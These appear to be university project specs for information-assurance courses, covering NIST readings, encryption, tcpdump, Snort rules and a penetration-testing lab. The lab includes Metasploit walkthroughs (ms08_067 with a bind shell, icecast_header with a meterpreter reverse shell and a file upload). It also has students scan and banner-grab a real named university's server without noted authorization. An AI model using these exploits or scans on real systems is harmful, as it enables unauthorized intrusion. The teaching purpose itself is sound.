CAMERON UNIVERSITY

Intro to Information Assurance/Security- IAS 2233

On line course

Project 1. NIST Documentation about Information Assurance.  (Total 100 Points)

Due date: Announced in Blackboard.

Please read policies in syllabus.

 

For this project you can choose between alternative A or alternative B with your Instructors’ approval.

Alternative A.

For this project you have to read some documents from the National Institute of Standards and Technology (NIS): FIPS Publication 199, FIPS Publication 200 and FIPS Publication SP800-27 Rev A.  You can look for these publications in the web page http://csrc.nist.gov/publications/

For this project you have to work with a classmate and submit one document.

Answer the following questions:

1. According to FISMA (Federal Information Security Management Act) explain in your own words the three security objectives for information and information systems.
2. Summarize the potential impact definitions for each security objective.
3. Explain the categorization of information systems.
4. Enumerate and explain briefly the minimum security requirements of federal Information systems.
5. Enumerate and explain the System Life-Cycle Description.
6. Choose two of the 6 categories of the IT (Information Technology) Security Principles. Enumerate the corresponding principles and explain them.
7. Why is IT Security a critical element in the system life-cycle?
8. Explain the difference between authentication and authorization.

You have to use a word processing in order to answer previous questions, the font size is 12, single space and at least 3 pages excluding figures, tables or graphs.

Alternative B.

If you are working and you have a specific information security topic you are interested in applying at work, you can talk to your instructor about it. By specific information security topic I mean topics like:

1. Information security policies,
2. Information security Risk assessment
3. Classification of information
4. Personnel security
5. Threats and vulnerabilities of information and information systems, and so forth.

What to Submit

• Cover page with :
  • Project number and name
  • Course number, name and semester
  • Author(s) name and e-mail address
  • Day and time
• One page length with a summary including what you learn, what difficulties you encountered and how did you solve them.
• Attached the project. Answers to question as in A or the corresponding topic you were authorized by the Instructor to work with.
• The corresponding bibliography.

 

INTRO INFORMATION ASSURANCE/SECURITY

CAMERON UNIVERSITY

 

On Line course

 

Project # 2. Contingency Planning. (Total 200 Points)

 

 Due date: Announced in Blackboard.

 

Please read policies in syllabus.

 

1. Using the Contingency Planning Guide for Information Technology standard 800-34 answer the following items:

 

1. What must be ensuring for a contingency plan to be successful.
2. What are the seven IT platform types that NIST enumerates for doing a contingency plan?
3. What are the seven step of a contingency process that an agency may apply to develop & maintain a viable contingency plan? Explain.
4. Explain in at least one page the contingency plan and risk management process. What are the contingency plan types?
5. Follow the seven steps proposed by NIST to develop an IT contingency plan process taking into account the case exercise as is page 281 of the textbook. (If you work for a company, you could develop the contingency plan for that company previous authorization of your Instructor).
6. Follow the technical contingency plan considerations when developing the contingency plan for the case as in page 281 or the corresponding company as authorized by your Instructor.

 

1. What to submit:
   1. Cover page with the name and number of this course, project number and title, name of students, and date.
   2. A one/half page described what you learn, what problems you encountered and how did you solve them.
   3. All questions and answers as in part A. of this spec.
   4. The corresponding IT contingency plan.
   5. References which is mandatory.

INTRO INFORMATION ASSURANCE/SECURITY

CAMERON UNIVERSITY

 

On Line course

 

Project # 2. Contingency Planning. (Total 100 Points)

 

 Due date: Announced in Blackboard.

 

Please read policies in syllabus.

 

You will be using the free software TrueCrypt (http://www.truecrypt.org/) in order to create a volume where you are going to save documents encrypted.

 

You have to take snapshots of the creation of the volume to encrypt, the creation of a file to encrypt, the encryption of the file as well as the decryption of it.

 

Part A.

 

For creating the volume follow the manual/documentation that you can find in the TrueCrypt web site.

 

For encrypt files mount the volume previously created and move the file to that volume.

 

For decryption you can mount the volume you created for encryption and move the file out of the volume.

 

Part B.

 

Find the document NIST FIPS 140-2 using the web and describe briefly the 4 security levels required for cryptographic modules.

 

 

1. What to submit:

 

• Cover page with the name and number of this course, project number and title, name of student, and date.
• Summary that includes what you learn, what problems you encountered and how did you solve them.
• Answer to the following questions:
  • What is the purpose of use of encryption in computer security? Explain
  • What is the purpose of use of hashes in computer security? Explain
  • Snapshots as in Part A.
  • Your findings in the NIST Document (Part B).
  • References which is mandatory.

 

CAMERON UNIVERSITY

Information Assurance Networking Fundamentals - IAS 3036

Project 1. Penetration testing phases I, II and III.  (Total 200 Points)

Due date: As Announced.

Rules:

Please refer to syllabus for rules, Teams of two students is mandatory.

Part A. – Step I.

1. General Description.

Both malicious and ethical hackers rely on various phases in their attacks:[1]

Reconnaissance, Scanning, exploitation. Malicious attackers go further: maintaining access with backdoors and rootkits, covering tracks with covert channels and log editing.

The goal of Phase I of this project is to do part of what is usually the first phase in penetration testing/ethical hacking, in order to know some of the tools used to find out information about the target (the organization that hires to do the penetration testing).

The purpose of the project is then to allow you to be familiar with this phase. The organization that you are going to look is just an example and is used for educational purposes only. If you decided to change the organization proposed in this project (Ibm), you can do that, but you have to ask previously the Instructor, explaining the reason for doing that.

For developing this project you have to use at least the following documentation: NIST (National Institute of Standards and Technology) Guideline on Network Security Testing and, the Open Source Security Testing Methodology Manual (OSSTMM) found at www.isecom.org/osstmm (OSSTMM.en.2.2.pdf).

1. Detail Description.

During the reconnaissance phase, the ethical hacker gathers …(Refer to point 11 in the Detail Description).

You have to gather information about the organization proposed in this project, like major business, major products and services, corporate officers and other VIPs, physical locations, new press releases and, so forth.

1. First look for company name in search engine such as Google, discovering domain names of potential target computers.
2. Then, use the site directive to find additional targets: site: ibm.com  –www.ibm.com
3. Look for older versions of websites at www.archive.org
4. Look for dates the domain was registered using InterNIC (www.internic.net/whois.html )
5. In a Linux environment use the command whois to find information about internet gateways of the company.
6. Using ARIN (ws.arin.net) look for the company name. Now use ARIN with different option like n, a, p and @ such as: n company_name. for the search of @ you have to give @ company_name.com.
7. Find the server address of www.company_name.com. For doing that use the nslookup command found in Windows and Linux.
8. According to NIST-SP800-42 guideline WHAT IS Network security testing, operational security testing and vulnerability.
9. According to NIST-SP800-42 guideline briefly describe the different types of testing (chapter 3).
10. Compare what you have done in this project and what is in the Open-Source Security testing methodology manual, Section Network Surveying.
11. Complete the sentence.

 

Part B.

You probably have to use your experience gained in Part A of this project, in order to develop the second step in penetration testing: scanning. To do this exercise you have to use as Company (Institution) name Universidad El Bosque, located in Bogota, Colombia. Again, our purpose is to learn, in order to be aware of risks and vulnerabilities involved in network computers. Ethic must be in every day (instant) of our life. Another particular name could be given, but if you are willing to change the company name, you have to have writing permission from the Instructor.

1. Detail Description.
2. Find and document the IP address of the web site of the institution.
3. Find and document an e-mail address of an employee of the institution.
4. Find and document when was the last update of the web page of the company.
5. Find and document the operating system of the server of the company. For doing that you can telnet the server of the company in the following way:
6. telnet    ip_address_server  80  <hit the enter key>
7. GET  /path/file.html  HTTP/1.1  <hit the enter key>
8. Wait and <hit enter key>
9. Find and document a current vulnerability of the operating system you found in step 4.
10. Find and document a solution to the vulnerability specified in step 5.
11. Find and document which ports (between 1 and 100) are open on the server of the company. For doing that you can use the netcat (nc) command found in Linux:[i]

                                                               i.      nc  –v  –n  –w1  ip_address_company   1-100

1. Find which services and protocols are offered in the open ports of the server of the company.
2. Find and document which ports (between 130 and 140) are open on the server of the company.
3. Find which services and protocols are offered in the open ports (between 130 and 140) of the server of the company.
4. Find and document at least one vulnerability in one of the open ports (between 130 and 140) of the server of the company.
5. According to NIST, what type of security testing was applied in Part B of this project.
6. According to OSSTMM, what type of internet security technology was applied in this project.

 

Part C.           What to Submit for Step I.

Answer of points 1 through 11 in the Detail Description of Part A, Answer of points 1 through 13 in the Detail Description of Part B and, in addition, half/one page single space, 12 font size of a description of what you learn, what difficulties you found and how did you solve them, and what was your experience in this project. A description of the roles and responsibilities of each team member, if the roles and responsibilities were full accomplished and were done on time.

 

Step II.

Part A.

1. Goal.

Phase III of penetrations testing is focused on exploitation. The goal of this project is to learn some exploits that a penetration tester or ethical hacker can use to compromise a target machine. In essence, exploitation is gaining access to a machine to run commands on it.

The tool that you will use is metasploit, which is in the top 3 tools for hacking. In the context of metasploit, an exploit is a program that can take advantage of a vulnerability in a target program, making it run a payload. The payload is a program that does something on the target computer, such as run programs, get and upload files and so forth.

1. General Description Windows vs. Windows.

DO NOT make any changes to the target system. Using the windows environment you will use metasploit. Metasploit is installed in computer with IP address xxx.168.2.a, this is the local host LHOST, the target (victim!) will be xxx.168.2.b which will be the remote host RHOST.

1. Using the start button lunch the metasploit application.
2. Click  <Ctrl>O and the metasploit console will appears.
3. To get a list of exploits, run the command: show exploits
4. You will be using the exploit exploit/windows/smb/ms08_067_netapi, for doing that run the command: use exploit/windows/smb/ms08_067_netapi
5. To get a list of payloads, run the command: show payloads
6.  You will be using the payload windows/shell/bind_tcp in order to get shell from the target, for doing that, run the command: set PAYLOAD windows/shell/bind_tcp
7. You can look the options needed running the command: show options
8. With the last command you can see that you need to set the local host, the remote host, and the local port, let’s do it!:
9. 9.      set LHOST xxx.yyy.u.v

10.  set RHOST xxx.168.2.b

11.  set LPORT 4444

12.  Everything is set, so now it goes the exploitation keying the command: exploit

13.  If you get windows prompt from the target, you can look around as:

14.  hostname

15.  ipconfig

16.  dir

17.  you can change to another directory, and so forth. Do not do any change in the victim system! Just look around.

18.  Finish the session running exit or hitting <ctrl> z

19.  Close metasploit

For this lab you have to copy the current session into WordPad in order to be submitted. Be sure before exiting, that you have an electronic copy of your work and that you have answered the following questions:

1. Find out what the exploitation used in step 4 is about.
2. Do you think that you can delete files in the target. If that is the case what is the metasploit command for doing that.
3. With the information obtained in step 3, look two more exploits for windows and explain briefly what those are about.

 

1. General Description Linux vs. Windows.

For this lab, you will be running metasploit in a Linux computer, the local host, against a windows computer, the victim. You will use what is called the meterpreter, a word that is a fusion of metasploit and interpreter. This option offers the possibility to an ethical hacker to run processes within the memory space of a process running in the target.

For developing this part of the project, first you have to run in the victim computer xxx.yyy.u.v

1. the application Icecast
2.  Once started Icecast click the button start server

Now you have to run metasploit in the local host xxx.yyy.u.z, for doing that do the following steps:

1. 3.       Open a terminal
2. In the command line type the command: sudo bash
3. Give the password
4. 6.       cd Desktop
5. 7.       cd framework-3.2
6. 8.       ./msfgui
7. 9.       <ctrl>O
8. 10.   show exploits
9. 11.   use exploit/windows/http/icecast_header
10. 12.   set PAYLOAD windows/meterpreter/reverse_tcp
11. 13.   show options
12. 14.   set RHOST XXX.YYY.U.V
13. 15.   set LHOST XXX.YYY.U.Z
14. 16.   set TARGET 0
15. 17.   service iptables stop
16. 18.   exploit
17. 19.   sysinfo
18. 20.   getuid
19. 21.   ps
20. Process ID for Icecast:
21. 23.   pwd
22. 24.   ls
23. 25.   execute  –f  cmd.exe  –c
24. interact n where n is the channel number you received when you run the execute command
25. 27.   hostname
26. 28.   ipconfig
27. 29.   dir
28. 30.   execute  -f  notepad.exe  -c
29. 31.   ps and give process ID for notepad 
30. 32.   exit
31. execute  –f  cmd.exe  –c
32. exit
33. execute  –f  cmd.exe  –c  -H
34. exit
35. ps and give process ID for all cmd that are running in the target
36. 38.   upload wins.exe
37. 39.   execute  –f  wins.exe   -c
38. ps and give process ID for wins.exe
39. 41.   exit
40. 42.   Finish the session running exit or hitting <ctrl> z or <ctrl> c 
41. Close metasploit

 

Now on the victim’s computer:

1. Stop Icecast
2. Close the Icecast application.

For this lab you have to copy the current session into WordPad in order to be submitted. Be sure before exiting, that you have an electronic copy of your work and that you have answered the following questions:

1. Steps 19, 20 and 21 of this description where running in the victims’ computer or in the penetration tester computer. Explain.
2. What happened when you execute step 30 of the previous description. Explain.
3. In step 35, what the command execute  –f  cmd.exe  –c  -H does?
4. What are steps 38 and 39 used for? Explain.
5. Explain the vulnerability exploited in step 11 and find the solution to cover it.

 

1. What to submit for Step II

Answer of points 1 through 8 in the Detail Description of Part II and III,  in addition, half/one page single space, 12 font size of a description of what you learn, what difficulties you found and how did you solve them, and what was your experience in this project. A description of the roles and responsibilities of each team member, if the roles and responsibilities were full accomplished and were done on time.

Attached the results obtained in metasploit in sections II and III.

 

---

[1] Planning, Scoping and Recognition. Sans Institute. www.sans.org

---

[i] In netcat the option –v means verbose printing out, -n means  not resolving names and –w1 means waiting no more than 1 second. Taken from Security 560 Sans Institute.

CAMERON UNIVERSITY

Information Assurance Networking Fundamentals - IAS 3036

Spring 2011

Project 2. Traffic Analysis.  (Total 150 Points)

Due date: 03/07/2011 Before Class. Files on Linux system Desktop/IAS3063.

 Please do not do any modification on those files.

Rules:

Please refer to syllabus for rules on projects. Team work of two students.

Part A.

Goal.

The tool that you will use for this project is tcpdump, which is a well known tool for traffic analysis and the goal of this lab is for you to become familiar in reading a raw TCPDump file using different options like:

-n            to disable hostname resolution.

-c            to count the number of records to read.

-x            to display records in hexadecimal.

-e            to display the MAC addresses.

-vv          to display records in very verbose mode (check tos, ttl, IP id,…).

-X            to display the payload in ASCII.

For this lab you are going to read the file em0.lpc, located under the Desktop/IAS3063 on the Linux Computer.  You are going to generate a script file that includes all the commands you use, but first get be familiar with TCPDump:

1. Using tcpdump read the file em0.lpc.
2.  Using tcpdump read the file em0.lpc using the option to disable hostname resolution.
3. Using tcpdump read the first record in the file em0.lpc.
4. Using tcpdump read the first record in the file em0.lpc in hexadecimal.
5. Using tcpdump read the file em0.lpc and find the source and destination MAC addresses of the second record.
6. Using tcpdump read the file em0.lpc displaying the payload in ASCII. What you read in the payload of the last record.

 

Laboratory # 2. Using filters.

Now that you became familiar with tcpdump you are going to use it with some filters, for example:

‘tcp’                                       will find tcp records only.

‘port 345’                             will find records that contain port 345.

‘dst port 23’                        will find records that contain as a destination port, port number 23.

‘udp and src port 21’       will find UDP records that contain as a source port, port 21.

‘dst host 10.10.10.3’        will find records with destination host 10.10.10.10.

‘icmp[0] = 3 and icmp[1] = 3’       will find all records with ICMP message destination unreachable with port unreachable.

Saying that, using the same file as in Lab # 1, find:

1. Records that have tcp protocol.
2. Records that use port number 21.
3. Records that use as a source port, port 23.
4. Records that have icmp protocol.
5. records with TCP protocol and destination port 21.
6. records with UDP protocol.

Now that you are familiar in using TCPDump let us generate a script file where you are going to use previous commands. The script file is going to content all commands you use and all the replays from the system.

You have to use as a convention for naming the script file: firstname1-lastname1-firsname2-lastname2, where first name and last name correspond to students' names. For example, emily-smith-francisco-martinez.

Using the names of the students generate a script file with the following commands, where numbers 1. through 6. indicate previous tcpdump commands from lab 1 and lab 2:

firstname1-lastname1-firsname2-lastname2  <enter>

pwd <enter>

ls  –ltr <enter> <enter>

1. <enter> <enter>

2. <enter> <enter>

3. <enter> <enter>

4. <enter> <enter>

5. <enter> <enter>

6. <enter> <enter>

1. <enter> <enter>

2. <enter> <enter>

3. <enter> <enter>

4. <enter> <enter>

5. <enter> <enter>

6. <enter> <enter>

ls –ltr <enter>

<enter>

<ctrl + D>

Print the corresponding script file.

Part B.

Laboratory # 3:

For this part of the lab you have to continue using the same input file im0.lpc as input to TCPDump and answer the following questions, based on your experience with lab # 1:

2.1 What records if any have IP options. Explain.

Hint: display records with hexadecimal option.

 

 

 

2.2 What is the IP header length in decimal of the first record:

 

 

2.3 What is the IP packet length of the first record:

 

 

2.4 What is the embedded protocol of the first IP packet:

 

 

2.5 Does the fourth record have TCP options? Explain.

 

 

 

2.6 What are the source and destination MAC addresses of the last record.

 

 

 

2.7 If there are any fragments in the data, what is the decimal value of the fragment offset field found in the hex record?

 

 

 

2.8 What are the UDP source and destination ports of the first UDP record in hexa.

 

 

 

 

For the second part of this lab use the same input file em0.lpc , you will be using filters. Say for example you need to check if the SYN flag is set, you use the filter ‘tcp[13] & 0x02 !=0’ because in the 13^th octet of the TCP header the second bit correspond to the SYN flag:

 

2^3	2^2	2^1	2^0	2^3	2^2	2^1	2^0
CWR	ECE	URG	ACK	PSH	RST	SYN	FIN

 

 

THE ‘&’ symbol corresponds to the AND.

 

2.9 Display the records that have the ACK flag set.

Command used:

 

2.10 Display the records that have either the RST or ACK flag set.

Command used:

 

 

2.11 Display records that have exactly the PSH and FIN flags set.

Hint: you must use a filter with ‘=’

Command used:

 

2.12 Display records that have the DF flag set.

Command used:

 

 

 

Part C.           What to Submit.

Script file as per indicated in part A of this project.  Answers 2.1 – 2.12 as per part B of this project. In addition, half/one page single space, 12 font size of a description of what you learn, what difficulties you found and how did you solve them, and what was your experience in this project. A description of the roles and responsibilities of each team member, if the roles and responsibilities were full accomplished and were done on time. This is a team work but grading criteria depends on the accomplishment of the duties of each team member.

 

CAMERON UNIVERSITY

Information Assurance Networking Fundamentals - IAS 3036

Project 3. Intrusion Detection System Snort.  (Total 100 Points)

Due date: As Announced.

Part A.

General Description.

Goal: The goal of this part of the lab is to become familiar with Snort, the free software NIDS. Use the Linux computer on the Network security lab. Use as a directory ~/Desktop/IAS3063. Whenever you run snort to generate alerts, you have to delete previous file:

rm  /var/log/snort/alerts.txt

	Command	Comments/Analysis/Answers
Find out different options that you can run Snort: snort	Snort  -?
What are the options d, v, and e are used for?		d is v is e is
Run Snort as a packet Sniffer(*1)	snort  -dve	How many packets processed: How many IP: How many TCP: How many UDP: How many ICMP:
Run Snort as a packet Sniffer but capture just 20 packets.	snort  -dve –n 20
Run Snort as a packet logger(*2)	snort  -dve –n 20  –l  .
Read packets captured with Snort using Snort.	snort  -v  –r    snort.log.aaaaaaa   snort  -dv  –r  snort.log.aaaaaaa   snort  -dve –r snort.log.aaaaaaa
Read packets captured with Snort using TCPDump.	tcpdump –r snort.log.aaaaaaa –n   tcpdump –r snort.log.aaaaaa –Xn
Using snort capture just 10 UDP packets	snort –dve –n 10 udp  -l .
Reading a and testing a configuration file	snort –Tc snort.conf
Using the configuration file snort.conf and reading the file capture with TCPDump nic1.lpc	snort –A cmg –c snort.conf –r nic1.lpc	How many alerts=   Destination IP Address=   What are those alerts about=
Using a configuration file and reading a file capture with TCPDump and storing alerts in the file alerts.txt	snort  –c /etc/snort/snort.conf –r nic1.lpc  -l .	How many alerts=

 

(*1) Kill the process after a few seconds. If there was no activity you need to find the interface to be used.

(*2) Snort creates a file with the name snort.log.aaaaaaaaaa where aaaaaaaaaa is a specific different number generated by snort every time you log activity. This file can be read by Snort itself and by other tools like TCPDump/Windump.

Part B.

Goal: The goal of this part of the lab is to become familiar with writing rules for Snort, i.e., become familiar with the snort.conf file.

 

Scenario: we are protecting the network 10.10.10.0/24 and we are going to analyze the traffic capture with TCPDump nic1.lpc

 

 

 

	rule/ Command	Comments/Analysis/Answers
Create a new file snort.conf and add a rule for alerting on the TCP protocol with flags SFP from any host any port to our network any port		How many alerts=   which ones=
You are interested in alert all the ip traffic to your host with port less than 1024.   Add one   alert rule in the snort.conf		How many alerts=   which ones=
Write down a new rule for finding icmp protocol with type 3 (three) and code 3 (three)		How many alerts=   which ones=    Is this some type of evasion?
Use TCPDump reading the same file in order to find the ICMP traffic with type 3 and code 3		How many records= Explain=
You are interested in alert for the TCP protocol and port number 3389. Add a new rule for doing that.		How many alerts=   which ones=